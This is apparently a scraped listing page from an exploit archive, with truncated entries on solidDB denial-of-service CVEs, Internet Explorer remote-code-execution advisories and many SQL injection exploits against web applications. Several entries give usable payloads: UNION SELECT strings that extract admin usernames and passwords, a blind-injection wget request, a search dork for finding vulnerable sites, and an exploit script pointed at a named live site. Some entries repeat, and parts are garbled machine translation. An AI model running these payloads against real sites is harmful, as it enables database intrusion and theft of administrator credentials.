CVE-2011-4890

The server in IBM solidDB 6.5 before FP9 and 7.0 before FP1 allows remote authenticated users to cause a denial of service daemon crash via a SELECT statement with a ROWNUM condition involving a subquery...

CVE-2012-0200

The server in IBM solidDB 6.5 before Interim Fix 6 does not properly initialize data structures, which allows remote authenticated users to cause a denial of service daemon crash via a SELECT statement with a redundant WHERE condition...

Design/Logic Flaw

The server in IBM solidDB 6.5 before FP9 and 7.0 before FP1 allows remote authenticated users to cause a denial of service daemon crash via a SELECT statement with a ROWNUM condition involving a subquery...

CVE-2011-4890

The server in IBM solidDB 6.5 before FP9 and 7.0 before FP1 allows remote authenticated users to cause a denial of service daemon crash via a SELECT statement with a ROWNUM condition involving a subquery...

IBM solidDB 6.5.0.8 - SELECT Statement WHERE Condition Denial of Service

IBM solidDB 6.5.0.8 - SELECT Statement WHERE Condition Denial of Service source: https://www.securityfocus.com/bid/52111/info IBM solidDB is prone to a denial-of-service vulnerability. Attackers can exploit this issue to crash the affected application, denying service to legitimate users. IBM...

IBM solidDB 6.5.0.8 - 'SELECT' Statement 'WHERE' Condition Denial of Service

source: https://www.securityfocus.com/bid/52111/info IBM solidDB is prone to a denial-of-service vulnerability. Attackers can exploit this issue to crash the affected application, denying service to legitimate users. IBM solidDB versions prior to 6.5.0.8 Interim Fix 6 are vulnerable. SELECT FROM ...

Aspcms 1.5 COOKIES injection 0day and fix-vulnerability warning-the black bar safety net

Aspcms 1.5 COOKIES injection 0day, register an account. Then after landing to modify the COOKIES of USERID values In the back plus the injected statement: UNION SELECT 1,2,3,4,5,6,username,adminpassword,9,1 0,1 1,1 2,1 3,1 4,1 5,1 6,1 7,1 8,1 9,2 0,2 1,2 2 from Aspcmsadmins Then edit the account...

WordPress Plugin jetpack - 'sharedaddy.php' ID SQL Injection

Exploit Title: WordPress jetpack plugin SQL Injection Vulnerability Date: 2011-19-11 Author: longrifle0x software: Wordpress Download:http://wordpress.org/extend/plugins/jetpack/ Tools: SQLMAP DESCRIPTION Discovered a vulnerability in jetpack, Wordpress Plugin, vulnerability is SQL injection...

WordPress Plugin Glossary - SQL Injection

Exploit Title: WordPress WP Glossary plugin SQL Injection Vulnerability Date: 2011-30-10 Author: longrifle0x software: Wordpress Download: http://wordpress.org/extend/plugins/wp-glossary/ Tools: SQLMAP DESCRIPTIONDiscovered a vulnerability in WP Glossary, Wordpress Plugin, vulnerability is SQL...

Simple Free PHP Forum Script 1 SQL Injection

Exploit Title: Simple Free PHP Forum Script 1,BENCHMARK500000000,MD5CHAR115,113,108,109,97,112,0 AND id='1 wget "http://127.0.0.1/forum/index.php?show=cat&id=1' AND 1=IF21,BENCHMARK500000000,MD5CHAR115,113,108,109,97,112,0 AND id='1" -------------- Vurnerable Code -------------- Line 150 of...

Two Remote Code Execution Vulnerabilities in Internet Explorer

Vulnerability 1: Internet Explorer Select Element Remote Code Execution Original advisory: http://ifsec.blogspot.com/2011/10/internet-explorer-select-element-remote.html I. OVERVIEW There is a vulnerability in Internet Explorer which enables execution of arbitrary code if the user visits a web pa...

Internet Explorer Select Element Cache Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Internet Explorer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the...

Microsoft Internet Explorer Select元素内存破坏漏洞(MS11-081)

BUGTRAQ ID: 49964 CVE ID: CVE-2011-1999 Microsoft Internet Explorer简称MSIE，是微软公司推出的一款网页浏览器。 IE在处理Select元素时在实现上存在内存破坏漏洞，远程攻击者可利用此漏洞远程代码，导致拒绝服务。 Microsoft Internet Explorer 9.x Microsoft Internet Explorer 8.x Microsoft Internet Explorer 7.x Microsoft Internet Explorer 6.x 临时解决方法：...

An education Station print page vulnerability squib administrator password and the Fix-vulnerability warning-the black bar safety net

The default background:/adlogin. asp Squib administrator password: In the domain of/inurl:infoPrint. asp? ArticleID=digital rear plus a space, then add the bottom of the Red statement, a carriage return can be union select 1,2,username,password,5,6,7,8,9,1 0,1 1,1 2,1 3,1 4,1 5,1 6,1 7,1 8,1 9,2...

WordPress Plugin Photoracer 1.0 - SQL Injection

WordPress Plugin Photoracer 1.0 - SQL Injection Exploit Title: WordPress Photoracer plugin prefix."photoracer where imgid=$imgid"; $out = $wpdb-getrow$q1; --- PoC --- http://www.site.com/wp-content/plugins/photoracer/viewimg.php?id=-1 UNION SELECT 0,1,2,3,4,VERSION,6,7,8...

Dzwonki Loga SQL Injection

|=----=----=----=----=----=--------=| | | | /\ /\ \ /\ /\ \ | | //\ /\ \ \L\ \ \ \ \ Turki$ hackers | | \ \ \ \ \ | =======================================================================...

KvVM SQL Injection

|=----=----=----=----=----=--------=| | | | /\ /\ \ /\ /\ \ | | //\ /\ \ \L\ \ \ \ \ Turki$ hackers | | \ \ \ \ \ '\ \ \ | | \ \ \ \ \ \L\ \ \ \ \ \ | | \ \ \ / \ \ \ | | // // //// | | | | | |=----=----=----=----=----=--------=|...

PHP-Nuke article.php SQL Injection

Coded By : darkTR - CodeHunters http://www.1337day.com/exploits/16550 Demo : http://www.moravanszky.com/article.php?sid=24 Site adresini açýklý kýsým olarak girin www.site.com/article.php?sid=24 þeklinde import re, time, urllib2 hedef = rawinput"Site adiniz giriniz:" sorgu =...

Alahliclub SQL Injection

|=----=----=----=----=----=--------=| | | | /\ /\ \ /\ /\ \ | | //\ /\ \ \L\ \ \ \ \ Turki$ hackers | | \ \ \ \ \ '\ \ \ | | \ \ \ \ \ \L\ \ \ \ \ \ | | \ \ \ / \ \ \ | | // // //// | | | | | |=----=----=----=----=----=--------=|...

Houben figure enterprise website system cookies injection-vulnerability warning-the black bar safety net

Based on asp+access corporate website source code, database has been provided with an anti-download the site more secure. To modify a site, custom your own to the page, and landscaping page is your own complete, website source code program is complete, the background powerful. Source code downloa...